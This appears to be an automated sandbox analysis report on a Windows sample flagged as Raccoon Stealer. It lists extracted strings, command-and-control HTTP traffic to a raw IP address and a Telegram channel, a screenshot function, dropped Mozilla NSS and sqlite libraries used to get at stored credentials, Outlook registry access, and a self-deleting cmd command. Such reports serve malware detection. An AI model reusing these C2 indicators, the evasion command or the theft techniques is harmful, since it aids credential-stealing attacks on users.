                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                    Source: qipcap.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                    Source: qipcap.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: qipcap.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: qipcap.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: qipcap.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: nssckbi.dll.0.drString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://ocsp.accv.es0
                    Source: qipcap.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: qipcap.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: qipcap.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://policy.camerfirma.com0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://repository.swisssign.com/0
                    Source: qipcap.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: qipcap.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: qipcap.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es00
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.certicamara.com/dpc/0Z
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.chambersign.org1
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.firmaprofesional.com/cps0
                    Source: mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: qipcap.dll.0.drString found in binary or memory: http://www.mozilla.com0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadis.bm0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadisglobal.com/cps0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                    Source: nssckbi.dll.0.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
                    Source: nssckbi.dll.0.drString found in binary or memory: https://repository.luxtrust.lu0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: https://t..180.174.100/
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmpString found in binary or memory: https://t.me/agrybirdsgamerept
                    Source: 31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                    Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel
                    Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel05
                    Source: qipcap.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoft.c
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.100
                    Source: unknownDNS traffic detected: queries for: t.me
                    Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,0_2_0042C157

                    E-Banking Fraud:

                    barindex
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Source: 31cGYywxgy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043E2E40_2_0043E2E4
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A2F90_2_0042A2F9
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043628C0_2_0043628C
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042C3830_2_0042C383
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004206DD0_2_004206DD
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004210B10_2_004210B1
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004373C60_2_004373C6
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004378190_2_00437819
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0041FD360_2_0041FD36
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0041E0140_2_0041E014
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042E1100_2_0042E110
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0040E1390_2_0040E139
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0044A4800_2_0044A480
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045A4BD0_2_0045A4BD
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004484BA0_2_004484BA
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0045A5DD0_2_0045A5DD
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004106480_2_00410648
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0046475B0_2_0046475B
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004187EC0_2_004187EC
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0041E8570_2_0041E857
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: String function: 0044F0F9 appears 31 times
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: String function: 00467790 appears 65 times
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-private-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                    Source: 31cGYywxgy.exe, 00000000.00000002.282990135.000000006E822000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs 31cGYywxgy.exe
                    Source: 31cGYywxgy.exe, 00000000.00000002.283168894.000000006E95B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs 31cGYywxgy.exe
                    Source: 31cGYywxgy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 31cGYywxgy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeSection loaded: sqlite3.dllJump to behavior
                    Source: 31cGYywxgy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 31cGYywxgy.exeReversingLabs: Detection: 40%
                    Source: 31cGYywxgy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\31cGYywxgy.exe 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/62@1/2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_0042A224
                    Source: softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: softokn3.dll.0.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s;
                    Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeMutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account ManagerJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: 31cGYywxgy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                    Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                    Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
